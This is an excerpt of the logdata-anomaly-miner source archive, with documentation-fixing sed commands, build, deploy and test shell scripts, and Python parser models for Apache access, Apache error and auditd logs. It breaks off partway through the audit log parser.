sed -i $'s/,property\\\_name/,\'property\\\_name\'/g' /tmp/aminerremotecontrol.md sed -i $'s/,attribute/,\'attribute\'/g' /tmp/aminerremotecontrol.md sed -i $'s/NewMatchPath,/\'NewMatchPath\',/g' /tmp/aminerremotecontrol.md sed -i $'s/NewMatchPathDet)/\'NewMatchPathDet\')/g' /tmp/aminerremotecontrol.md sed -i $'s/auto\\\_include\\\_flag,/\'auto\\\_include\\\_flag\',/g' /tmp/aminerremotecontrol.md sed -i $'s/auto\\\_include\\\_flag)/\'auto\\\_include\\\_flag\')/g' /tmp/aminerremotecontrol.md sed -i $'s/,old\\\_component\\\_name,/,\'old\\\_component\\\_name\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,new\\\_component\\\_name/,\'new\\\_component\\\_name\'/g' /tmp/aminerremotecontrol.md sed -i $'s/,history\\\_component\\\_name/,\'history\\\_component\\\_name\'/g' /tmp/aminerremotecontrol.md sed -i $'s/NewMatchPathDetector/\'NewMatchPathDetector\'/g' /tmp/aminerremotecontrol.md sed -i $'s/\*\'NewMatchPathDetector\'\*/\*NewMatchPathDetector\*/g' /tmp/aminerremotecontrol.md sed -i $'s/,component\\\_name/,\'component\\\_name\'/g' /tmp/aminerremotecontrol.md sed -i $'s/AtomFilter/,\'AtomFilter\'/g' /tmp/aminerremotecontrol.md sed -i $'s/LogResourceList/\'LogResourceList\'/g' /tmp/aminerremotecontrol.md sed -i $'s/,atom\\\_handler,/,\'atom\\\_handler\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,destination\\\_file/,\'destination\\\_file\'/g' /tmp/aminerremotecontrol.md sed -i $'s,/tmp/config.py,\'/tmp/config.py\',g' /tmp/aminerremotecontrol.md sed -i $'s/,EnhancedNewMatchPathValueComboDetector,/,\'EnhancedNewMatchPathValueComboDetector\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,MissingMatchPathValueDetector,/,\'MissingMatchPathValueDetector\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,NewMatchPathValueComboDetector,/,\'NewMatchPathValueComboDetector\',/g' /tmp/aminerremotecontrol.md sed -i $'s,new/path,\'new/path\',g' /tmp/aminerremotecontrol.md sed -i $'s/,VolatileLogarithmicBackoffEventHistory,/,\'VolatileLogarithmicBackoffEventHistory\',/g' 
/tmp/aminerremotecontrol.md sed -i $'s/,MailAlerting.TargetAddress,/,\'MailAlerting.TargetAddress\',/g' /tmp/aminerremotecontrol.md sed -i $'s/root@localhost/\'root@localhost\'/g' /tmp/aminerremotecontrol.md sed -i $'s/,MailAlerting.FromAddress,/,\'MailAlerting.FromAddress\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,MailAlerting.SubjectPrefix,/,\'MailAlerting.SubjectPrefix\',/g' /tmp/aminerremotecontrol.md sed -i $'s/aminer Alerts:)/\'aminer Alerts:\')/g' /tmp/aminerremotecontrol.md sed -i $'s/,MailAlerting.EventCollectTime,/,\'MailAlerting.EventCollectTime\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,MailAlerting.MinAlertGap,/,\'MailAlerting.MinAlertGap\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,MailAlerting.MaxAlertGap,/,\'MailAlerting.MaxAlertGap\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,MailAlerting.MaxEventsPerMessage,/,\'MailAlerting.MaxEventsPerMessage\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,LogPrefix,/,\'LogPrefix\',/g' /tmp/aminerremotecontrol.md sed -i $'s/Original log/\'Original log/g' /tmp/aminerremotecontrol.md sed -i $'s/line: /line: \'/g' /tmp/aminerremotecontrol.md sed -i $'s/This defaults to ./This defaults to \'\'./g' /tmp/aminerremotecontrol.md sed -i $'s/,Resources.MaxMemoryUsage,/,\'Resources.MaxMemoryUsage\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,Core.PersistencePeriod,/,\'Core.PersistencePeriod\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,Log.StatisticsLevel,/,\'Log.StatisticsLevel\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,Log.DebugLevel,/,\'Log.DebugLevel\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,Log.StatisticsPeriod,/,\'Log.StatisticsPeriod\',/g' /tmp/aminerremotecontrol.md sed -i $'s/\*\*\*socket/\*\* \*socket/g' /tmp/aminerremotecontrol.md sed -i $'s/\*\*\*command/\*\* \*command/g' /tmp/aminerremotecontrol.md sed -i $'s/\*\*\*file/\*\* \*file/g' /tmp/aminerremotecontrol.md sed -i $'s/\*\*\*data/\*\* \*data/g' /tmp/aminerremotecontrol.md sed -i $'s/command\*\*\*/command\* \*\*/g' /tmp/aminerremotecontrol.md 
sed -i $'s/file\*\*\*/file\* \*\*/g' /tmp/aminerremotecontrol.md sed -i $'s/^\*\*$//g' /tmp/aminerremotecontrol.md sed -i $'s/^\*\* \*\*\*/\*\*\*/g' /tmp/aminerremotecontrol.md sed -i $'s/\*\*\* \*\*/\*\*\*/g' /tmp/aminerremotecontrol.md sed -i $'s/\*\*\*/\*\*/g' /tmp/aminerremotecontrol.md sed -i ':a;N;$!ba;s/\*\*aminerremotecontrol\*\* \\\[\*\*\\\[--exec \*\* \*command\* \*\*\\] | \\\[--exec-file\n\*\* \*file\* \*\*\\]\*\*\\] \*\*\\\[OPTIONS\\]...\*\*/\*\*aminerremotecontrol\*\* \\\[\*\*\\\[--exec \*\* \*command\* \*\*\\] | \\\[--exec-file\*\* \*file\* \*\*\\]\*\*\\] \*\*\\\[OPTIONS\\]...\*\*/g' /tmp/aminerremotecontrol.md logdata-anomaly-miner-2.8.0/scripts/deploydocs.sh000077500000000000000000000012441500476301700221010ustar00rootroot00000000000000#!/usr/bin/bash BRANCH=$1 SOURCE=$2 DEST=$3 case $BRANCH in development) test -d $DEST/development && rm -rf $DEST/development cp -r $SOURCE $DEST/development ;; main) VERSION=$(grep '__version__ =' source/root/usr/lib/logdata-anomaly-miner/metadata.py | awk -F '"' '{print $2}') if [ $(echo $VERSION | grep -P "\d+\.\d+\.\d+") ] then test -d $DEST/$VERSION && rm -rf $DEST/$VERSION cp -r $SOURCE $DEST/$VERSION test -e $DEST/current && unlink $DEST/current ln -s $DEST/$VERSION $DEST/current else echo "Unable to identify the aminer-version!" exit 1 fi ;; *) echo "usage: $0 main|development" exit 1 ;; esac exit 0 logdata-anomaly-miner-2.8.0/scripts/distritest.sh000077500000000000000000000006311500476301700221310ustar00rootroot00000000000000#!/bin/bash sudo sed -i '/imklog/s/^/#/' /etc/rsyslog.conf sudo rsyslogd echo "ServerName localhost" | sudo tee -a /etc/apache2/apache2.conf > /dev/null sudo service apache2 start curl localhost curl -XPOST localhost curl -I localhost sudo chown aminer:aminer /var/lib/aminer sudo chmod 700 /var/lib/aminer sudo timeout --preserve-status 20s aminer -o --config /home/aminer/gettingStarted-config.yml exit $? 
logdata-anomaly-miner-2.8.0/scripts/prep-docker-compose.sh000077500000000000000000000015471500476301700236200ustar00rootroot00000000000000#!/bin/bash test -d aminercfg || mkdir aminercfg test -d persistency || mkdir persistency test -d persistency/log || mkdir persistency/log test -d logs || mkdir logs test -d akafka || mkdir akafka test -e aminercfg/config.yml || cp -r source/root/etc/aminer/template_config.yml aminercfg/config.yml test -d aminercfg/conf-enabled || mkdir aminercfg/conf-enabled test -e aminercfg/conf-enabled/ApacheAccessModel.py || cp source/root/etc/aminer/conf-available/generic/ApacheAccessModel.py aminercfg/conf-enabled/ApacheAccessModel.py sed -i "s+# - 'unix+ - 'unix+g" aminercfg/config.yml sed -i "s+ - 'file:///var/log/apache2/access.log'+# - 'file:///logs/access.log'+g" aminercfg/config.yml sed -i "s+# RemoteControlSocket: '/var/lib/aminer/log/remcontrol.sock'+RemoteControlSocket: '/var/lib/aminer/log/remcontrol.sock'+g" aminercfg/config.yml logdata-anomaly-miner-2.8.0/scripts/supervisord.conf000066400000000000000000000003701500476301700226300ustar00rootroot00000000000000[supervisord] nodaemon=true pidfile=/var/lib/supervisor/supervisor.pid [unix_http_server] file=/var/lib/supervisor/supervisor.sock [include] files = /etc/supervisor/conf.d/*.conf [program:aminer] command=/usr/lib/logdata-anomaly-miner/aminer.py logdata-anomaly-miner-2.8.0/scripts/testingwrapper.sh000077500000000000000000000076761500476301700230310ustar00rootroot00000000000000#!/bin/bash TESTDIR=/home/aminer/logdata-anomaly-miner/aecid-testsuite if [ $# -gt 0 ] then sudo sed -i '/imklog/s/^/#/' /etc/rsyslog.conf sudo rsyslogd sudo service postfix start fi case "$1" in runSuspendModeTest) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runUnittests) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runAminerDemo) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runAminerJsonInputDemo) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runAminerXmlInputDemo) cd $TESTDIR ./${1}.sh ${*:2} exit $? 
;; runAminerIntegrationTest) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runCoverageTests) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runRemoteControlTest) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runGettingStarted) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runTryItOut) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runHowToCreateYourOwnSequenceDetector) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runHowToCreateYourOwnFrequencyDetector) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runHowToMissingMatchPathValueDetector) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runHowToEntropyDetector) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runJsonDemo) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runAminerEncodingDemo) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runOfflineMode) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runMypy) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runBandit) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runVulture) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runFlake8) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runMccabe) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runConfAvailableTest) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runReleaseStringCheck) cd $TESTDIR ./${1}.sh ${*:2} exit $? 
;; ALL) cd $TESTDIR ./runMypy.sh ./runBandit.sh ./runVulture.sh ./runFlake8.sh ./runMccabe.sh ./runReleaseStringCheck.sh ./runSuspendModeTest.sh ./runUnittests.sh ./runRemoteControlTest.sh ./runConfAvailableTest.sh ./runAminerDemo.sh demo/aminer/demo-config.py ./runAminerDemo.sh demo/aminer/jsonConverterHandler-demo-config.py ./runAminerDemo.sh demo/aminer/template_config.py ./runAminerDemo.sh demo/aminer/template_config.yml ./runAminerDemo.sh demo/aminer/demo-config.yml ./runAminerEncodingDemo.sh demo/aminer/demo-config.py ./runAminerEncodingDemo.sh demo/aminer/demo-config.yml ./runAminerJsonInputDemo.sh ./runAminerXmlInputDemo.sh ./runJsonDemo.sh demo/aminerJsonInputDemo/json-aminer-demo.yml ./runJsonDemo.sh demo/aminerJsonInputDemo/json-elastic-demo.yml ./runJsonDemo.sh demo/aminerJsonInputDemo/json-eve-demo.yml ./runJsonDemo.sh demo/aminerJsonInputDemo/json-journal-demo.yml ./runJsonDemo.sh demo/aminerJsonInputDemo/json-wazuh-demo.yml ./runAminerIntegrationTest.sh aminerIntegrationTest.sh config.py ./runAminerIntegrationTest.sh aminerIntegrationTest2.sh config21.py config22.py ./runOfflineMode.sh ./runGettingStarted.sh ./runTryItOut.sh ./runHowToCreateYourOwnSequenceDetector.sh ./runHowToCreateYourOwnFrequencyDetector.sh ./runHowToMissingMatchPathValueDetector.sh ./runHowToEntropyDetector.sh ./runCoverageTests.sh exit $? 
;; SHELL) bash ${*:2} exit 0 ;; *) echo "Usage: [ ALL | SHELL | runSuspendModeTest | runUnittests | runAminerDemo | runJsonDemo | runAminerJsonInputDemo" echo " runAminerXmlInputDemo | runAminerIntegrationTest | runOfflineMode | runCoverageTests | runRemoteControlTest" echo " runTryItOut | runGettingStarted | runHowToCreateYourOwnSequenceDetector | runHowToCreateYourOwnFrequencyDetector" echo " runHowToMissingMatchPathValueDetector | runHowToEntropyDetector | runAminerEncodingDemo | runMypy | runBandit" echo " runVulture | runFlake8 | runMccabe | runConfAvailableTest | runReleaseStringCheck ] " exit 1 ;; esac exit 0 logdata-anomaly-miner-2.8.0/source/000077500000000000000000000000001500476301700172055ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/000077500000000000000000000000001500476301700201705ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/etc/000077500000000000000000000000001500476301700207435ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/etc/aminer/000077500000000000000000000000001500476301700222165ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/000077500000000000000000000000001500476301700250615ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/ait-lds/000077500000000000000000000000001500476301700264165ustar00rootroot00000000000000ApacheAccessParsingModel.py000066400000000000000000000064311500476301700335250ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/ait-lds"""This module defines a generated parser model.""" from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement 
import FixedDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement def get_model(): """Return a model to parse Apache Access logs from the AIT-LDS.""" alphabet = b"!'#$%&\"()*+,-./0123456789:;<>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\\^_`abcdefghijklmnopqrstuvwxyz{|}~=[]" model = SequenceModelElement("model", [ FirstMatchModelElement("client_ip", [ SequenceModelElement("client_ip", [ DelimitedDataModelElement("domain", b" "), FixedDataModelElement("sp0", b" "), IpAddressDataModelElement("client_ip") ]), SequenceModelElement("localhost", [ DelimitedDataModelElement("domain", b" "), FixedDataModelElement("sp0", b" "), FixedDataModelElement("localhost", b"::1") ]), IpAddressDataModelElement("client_ip"), FixedDataModelElement("localhost", b"::1") ]), FixedDataModelElement("sp1", b" "), VariableByteDataModelElement("client_id", alphabet), FixedDataModelElement("sp2", b" "), VariableByteDataModelElement("user_id", alphabet), FixedDataModelElement("sp3", b" ["), DateTimeModelElement("time", b"%d/%b/%Y:%H:%M:%S%z"), FixedDataModelElement("sp4", b'] "'), FirstMatchModelElement("fm", [ FixedDataModelElement("dash", b"-"), SequenceModelElement("request", [ FixedWordlistDataModelElement("method", [ b"GET", b"POST", b"PUT", b"HEAD", b"DELETE", b"CONNECT", b"OPTIONS", b"TRACE", b"PATCH", b"REPORT", b"PROPFIND", b"MKCOL"]), FixedDataModelElement("sp5", b" "), DelimitedDataModelElement("request", b" ", b"\\"), FixedDataModelElement("sp6", b" "), DelimitedDataModelElement("version", b'"'), ]) ]), FixedDataModelElement("sp7", b'" '), DecimalIntegerValueModelElement("status_code"), FixedDataModelElement("sp8", b" "), 
DecimalIntegerValueModelElement("content_size"), OptionalMatchModelElement( "combined", SequenceModelElement("combined", [ FixedDataModelElement("sp9", b' "'), DelimitedDataModelElement("referer", b'"', b"\\"), FixedDataModelElement("sp10", b'" "'), DelimitedDataModelElement("user_agent", b'"', b"\\"), FixedDataModelElement("sp11", b'"'), ])) ]) return model logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/ait-lds/ApacheErrorParsingModel.py000066400000000000000000000204111500476301700334660ustar00rootroot00000000000000"""This module defines a generated parser model.""" from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement def get_model(): """Return a model to parse Apache Error logs from the AIT-LDS.""" model = FirstMatchModelElement("model", [ FixedDataModelElement("mkdir_failed", b"mkdir failed on directory /var/run/samba/msg.lock: Permission denied"), SequenceModelElement("with_data", [ FixedDataModelElement("sp1", b"["), FixedWordlistDataModelElement("day", [b"Mon", b"Tue", b"Wed", b"Thu", b"Fri", b"Sat", b"Sun"]), FixedDataModelElement("sp2", b" "), DateTimeModelElement("time", b"%b %d %H:%M:%S.%f %Y"), FixedDataModelElement("bracket_str", b"] ["), DelimitedDataModelElement("source", b"]"), FixedDataModelElement("pid_str", b"] [pid "), 
DecimalIntegerValueModelElement("pid"), FixedDataModelElement("bracket_str", b"] "), FirstMatchModelElement("fm", [ SequenceModelElement("client", [ FixedDataModelElement("client_str", b"[client "), IpAddressDataModelElement("client_ip"), FixedDataModelElement("colon", b":"), DecimalIntegerValueModelElement("client_port"), FirstMatchModelElement("fm", [ SequenceModelElement("php", [ FixedDataModelElement("php", b"] PHP "), FirstMatchModelElement("fphp", [ SequenceModelElement("warning", [ FixedDataModelElement("warning_str", b"Warning: "), FirstMatchModelElement("warning", [ SequenceModelElement("declaration", [ FixedDataModelElement("declaration_str", b"Declaration of "), DelimitedDataModelElement("function", b")"), FixedDataModelElement("compatible_str", b") should be compatible with "), DelimitedDataModelElement("function2", b")"), FixedDataModelElement("compatible_str", b") in "), DelimitedDataModelElement("path", b" "), FixedDataModelElement("compatible_str", b" on line "), DecimalIntegerValueModelElement("line"), FixedDataModelElement("referer_str", b", referer: "), AnyByteDataModelElement("referer")]), SequenceModelElement("system", [ FixedDataModelElement("system_str", b"system(): Cannot execute a blank command in "), DelimitedDataModelElement("path", b" "), FixedDataModelElement("compatible_str", b" on line "), DecimalIntegerValueModelElement("line")]), AnyByteDataModelElement("warning_msg") ])]), SequenceModelElement("notice", [ FixedDataModelElement("notice_str", b"Notice: Undefined index: "), DelimitedDataModelElement("command", b" "), FixedDataModelElement("sp", b" in "), DelimitedDataModelElement("path", b" "), FixedDataModelElement("compatible_str", b" on line "), DecimalIntegerValueModelElement("line")]), SequenceModelElement("deprecated", [ FixedDataModelElement("deprecated_str", b"Deprecated: Methods with the same name as their class " b"will not be constructors in a future version of PHP; "), DelimitedDataModelElement("class", b" "), 
FixedDataModelElement("constructor_str", b" has a deprecated constructor in "), DelimitedDataModelElement("path", b" "), FixedDataModelElement("compatible_str", b" on line "), DecimalIntegerValueModelElement("line"), OptionalMatchModelElement("opt", SequenceModelElement("referer", [ FixedDataModelElement("referer_str", b", referer: "), AnyByteDataModelElement("referer") ])) ]), SequenceModelElement("fatal", [ FixedDataModelElement("fatal_str", b"Fatal error: "), AnyByteDataModelElement("error_msg") ]) ]) ]), SequenceModelElement("ah", [ FixedDataModelElement("ah_str", b"] AH"), DecimalIntegerValueModelElement("ah_number", value_pad_type=DecimalIntegerValueModelElement.PAD_TYPE_ZERO), FixedDataModelElement("colon", b": "), AnyByteDataModelElement("msg") ]), SequenceModelElement("script", [ FixedDataModelElement("script_str", b"] script '"), DelimitedDataModelElement("script_path", b"'"), FixedDataModelElement("msg", b"' not found or unable to stat"), OptionalMatchModelElement("referer", SequenceModelElement("referer", [ FixedDataModelElement("referer_str", b", referer: "), AnyByteDataModelElement("referer") ])) ]) ]), ]), SequenceModelElement("notice", [ FixedDataModelElement("ah_str", b"AH"), DecimalIntegerValueModelElement("ah_number", value_pad_type=DecimalIntegerValueModelElement.PAD_TYPE_ZERO), FixedDataModelElement("colon", b": "), AnyByteDataModelElement("msg") ]), SequenceModelElement("end_of_file", [ FixedDataModelElement("end_of_file_str", b"(70014)End of file found: [client "), IpAddressDataModelElement("client_ip"), FixedDataModelElement("colon", b":"), DecimalIntegerValueModelElement("port"), FixedDataModelElement("error_msg", b"] AH01102: error reading status line from remote server "), DelimitedDataModelElement("domain", b":"), FixedDataModelElement("colon", b":"), DecimalIntegerValueModelElement("remote_port") ]) ]) ]), SequenceModelElement("bash", [ FixedDataModelElement("bash", b"bash: "), AnyByteDataModelElement("error_msg") ]) ]) return model 
logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/ait-lds/AuditdParsingModel.py000066400000000000000000000531151500476301700325140ustar00rootroot00000000000000"""This module defines a generated parser model.""" from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement def get_model(): """Return a model to parse Audit logs from the AIT-LDS.""" alphabet = b"!'#$%&\"()*+,-./0123456789:;<>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\\^_`abcdefghijklmnopqrstuvwxyz{|}~=[]" seq = [ FixedDataModelElement("audit_str", b"audit("), DateTimeModelElement("time", b"%s.%f"), FixedDataModelElement("colon_str", b":"), DecimalIntegerValueModelElement("id"), FixedDataModelElement("pid_str", b"): pid="), VariableByteDataModelElement("pid", alphabet), FixedDataModelElement("uid_str", b" uid="), VariableByteDataModelElement("uid", alphabet), FixedDataModelElement("auid_str", b" auid="), VariableByteDataModelElement("auid", alphabet), FixedDataModelElement("ses_str", b" ses="), VariableByteDataModelElement("ses", alphabet), FixedDataModelElement("msg2_str", b" msg="), VariableByteDataModelElement("msg2", alphabet), FirstMatchModelElement("fm", [ SequenceModelElement("acct", [ FixedDataModelElement("acct_str", b" acct="), VariableByteDataModelElement("acct", alphabet)]), SequenceModelElement("comm", [ FixedDataModelElement("comm_str", b" comm="), VariableByteDataModelElement("comm", alphabet)]), SequenceModelElement("id", [ 
FixedDataModelElement("id_str", b" id="), VariableByteDataModelElement("id", alphabet)]), SequenceModelElement("cmd", [ FixedDataModelElement("cmd_str", b" cmd="), VariableByteDataModelElement("cmd", alphabet)])]), OptionalMatchModelElement( "opt", SequenceModelElement("opt_seq", [ FixedDataModelElement("exe_str", b" exe="), VariableByteDataModelElement("exe", alphabet), FixedDataModelElement("hostname_str", b" hostname="), VariableByteDataModelElement("hostname", alphabet), FixedDataModelElement("addr_str", b" addr="), VariableByteDataModelElement("addr", alphabet)])), FixedDataModelElement("terminal_str", b" terminal="), VariableByteDataModelElement("terminal", alphabet), FixedDataModelElement("res_str", b" res="), VariableByteDataModelElement("res", alphabet)] model = SequenceModelElement("model", [ FixedDataModelElement("type_str", b"type="), FirstMatchModelElement("type", [ SequenceModelElement("execve", [ FixedDataModelElement("execve_str", b"EXECVE msg=audit("), DateTimeModelElement("time", b"%s.%f"), FixedDataModelElement("colon_str", b":"), DecimalIntegerValueModelElement("id"), FixedDataModelElement("argc_str", b"): argc="), DecimalIntegerValueModelElement("argc", value_sign_type=DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL), FixedDataModelElement("a0_str", b" a0="), VariableByteDataModelElement("a0", alphabet), OptionalMatchModelElement( "opt1", SequenceModelElement("seq1", [ FixedDataModelElement("a1_str", b" a1="), VariableByteDataModelElement("a1", alphabet), OptionalMatchModelElement( "opt2", SequenceModelElement("seq2", [ FixedDataModelElement("a2_str", b" a2="), VariableByteDataModelElement("a2", alphabet), OptionalMatchModelElement( "opt3", SequenceModelElement("seq3", [ FixedDataModelElement("a3_str", b" a3="), VariableByteDataModelElement("a3", alphabet), OptionalMatchModelElement( "opt4", SequenceModelElement("seq4", [ FixedDataModelElement("a4_str", b" a4="), VariableByteDataModelElement("a4", alphabet) ]) ), OptionalMatchModelElement( 
"opt5", SequenceModelElement("seq5", [ FixedDataModelElement("a5_str", b" a5="), VariableByteDataModelElement("a5", alphabet) ]) ), OptionalMatchModelElement( "opt6", SequenceModelElement("seq6", [ FixedDataModelElement("a6_str", b" a6="), VariableByteDataModelElement("a6", alphabet) ]) ), OptionalMatchModelElement( "opt7", SequenceModelElement("seq7", [ FixedDataModelElement("a7_str", b" a7="), VariableByteDataModelElement("a7", alphabet) ]) ), OptionalMatchModelElement( "opt8", SequenceModelElement("seq8", [ FixedDataModelElement("a8_str", b" a8="), VariableByteDataModelElement("a8", alphabet) ]) ), OptionalMatchModelElement( "opt9", SequenceModelElement("seq9", [ FixedDataModelElement("a9_str", b" a9="), VariableByteDataModelElement("a9", alphabet) ]) ), OptionalMatchModelElement( "opt10", SequenceModelElement("seq10", [ FixedDataModelElement("a10_str", b" a10="), VariableByteDataModelElement("a10", alphabet) ]) ), OptionalMatchModelElement( "opt11", SequenceModelElement("seq11", [ FixedDataModelElement("a11_str", b" a11="), VariableByteDataModelElement("a11", alphabet) ]) ), OptionalMatchModelElement( "opt12", SequenceModelElement("seq12", [ FixedDataModelElement("a12_str", b" a12="), VariableByteDataModelElement("a12", alphabet) ]) ), OptionalMatchModelElement( "opt13", SequenceModelElement("seq13", [ FixedDataModelElement("a13_str", b" a13="), VariableByteDataModelElement("a13", alphabet) ]) ), OptionalMatchModelElement( "opt14", SequenceModelElement("seq14", [ FixedDataModelElement("a14_str", b" a14="), VariableByteDataModelElement("a14", alphabet) ]) )]))]))]))]), SequenceModelElement("proctitle", [ FixedDataModelElement("type_str", b"PROCTITLE msg=audit("), DateTimeModelElement("time", b"%s.%f"), FixedDataModelElement("colon_str", b":"), DecimalIntegerValueModelElement("id"), FixedDataModelElement("proctitle_str", b"): proctitle="), VariableByteDataModelElement("proctitle", alphabet)]), SequenceModelElement("syscall", [ FixedDataModelElement("msg_str", 
b"SYSCALL msg=audit("), DateTimeModelElement("time", b"%s.%f"), FixedDataModelElement("colon_str", b":"), DecimalIntegerValueModelElement("id"), FixedDataModelElement("arch_str", b"): arch="), VariableByteDataModelElement("arch", alphabet), FixedDataModelElement("syscall_str", b" syscall="), DecimalIntegerValueModelElement("syscall", value_sign_type=DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL), FixedDataModelElement("success_str", b" success="), VariableByteDataModelElement("success", alphabet), FixedDataModelElement("exit_str", b" exit="), VariableByteDataModelElement("exit", alphabet), FixedDataModelElement("a0_str", b" a0="), VariableByteDataModelElement("a0", alphabet), FixedDataModelElement("a1_str", b" a1="), VariableByteDataModelElement("a1", alphabet), FixedDataModelElement("a2_str", b" a2="), VariableByteDataModelElement("a2", alphabet), FixedDataModelElement("a3_str", b" a3="), VariableByteDataModelElement("a3", alphabet), FixedDataModelElement("items_str", b" items="), VariableByteDataModelElement("items", alphabet), FixedDataModelElement("ppid_str", b" ppid="), VariableByteDataModelElement("ppid", alphabet), FixedDataModelElement("pid_str", b" pid="), VariableByteDataModelElement("pid", alphabet), FixedDataModelElement("auid_str", b" auid="), VariableByteDataModelElement("auid", alphabet), FixedDataModelElement("uid_str", b" uid="), VariableByteDataModelElement("uid", alphabet), FixedDataModelElement("gid_str", b" gid="), VariableByteDataModelElement("gid", alphabet), FixedDataModelElement("euid_str", b" euid="), VariableByteDataModelElement("euid", alphabet), FixedDataModelElement("suid_str", b" suid="), VariableByteDataModelElement("suid", alphabet), FixedDataModelElement("fsuid_str", b" fsuid="), VariableByteDataModelElement("fsuid", alphabet), FixedDataModelElement("egid_str", b" egid="), VariableByteDataModelElement("egid", alphabet), FixedDataModelElement("sgid_str", b" sgid="), VariableByteDataModelElement("sgid", alphabet), 
FixedDataModelElement("fsgid_str", b" fsgid="), VariableByteDataModelElement("fsgid", alphabet), FixedDataModelElement("tty_str", b" tty="), VariableByteDataModelElement("tty", alphabet), FixedDataModelElement("ses_str", b" ses="), VariableByteDataModelElement("ses", alphabet), FixedDataModelElement("comm_str", b" comm="), VariableByteDataModelElement("comm", alphabet), FixedDataModelElement("exe_str", b" exe="), VariableByteDataModelElement("exe", alphabet), FixedDataModelElement("key_str", b" key="), VariableByteDataModelElement("key", alphabet)]), SequenceModelElement("path", [ FixedDataModelElement("msg_str", b"PATH msg=audit("), DateTimeModelElement("time", b"%s.%f"), FixedDataModelElement("colon_str", b":"), DecimalIntegerValueModelElement("id"), FixedDataModelElement("item_str", b"): item="), DecimalIntegerValueModelElement("item", value_sign_type=DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL), FixedDataModelElement("name_str", b" name="), VariableByteDataModelElement("name", alphabet), FirstMatchModelElement("path", [ SequenceModelElement("nametype", [ FixedDataModelElement("nametype_str", b" nametype="), VariableByteDataModelElement("nametype", alphabet)]), SequenceModelElement("inode", [ FixedDataModelElement("inode_str", b" inode="), DecimalIntegerValueModelElement("inode", value_sign_type=DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL), FixedDataModelElement("dev_str", b" dev="), VariableByteDataModelElement("dev", alphabet), FixedDataModelElement("mode_str", b" mode="), VariableByteDataModelElement("mode", alphabet), FixedDataModelElement("ouid_str", b" ouid="), VariableByteDataModelElement("ouid", alphabet), FixedDataModelElement("ogid_str", b" 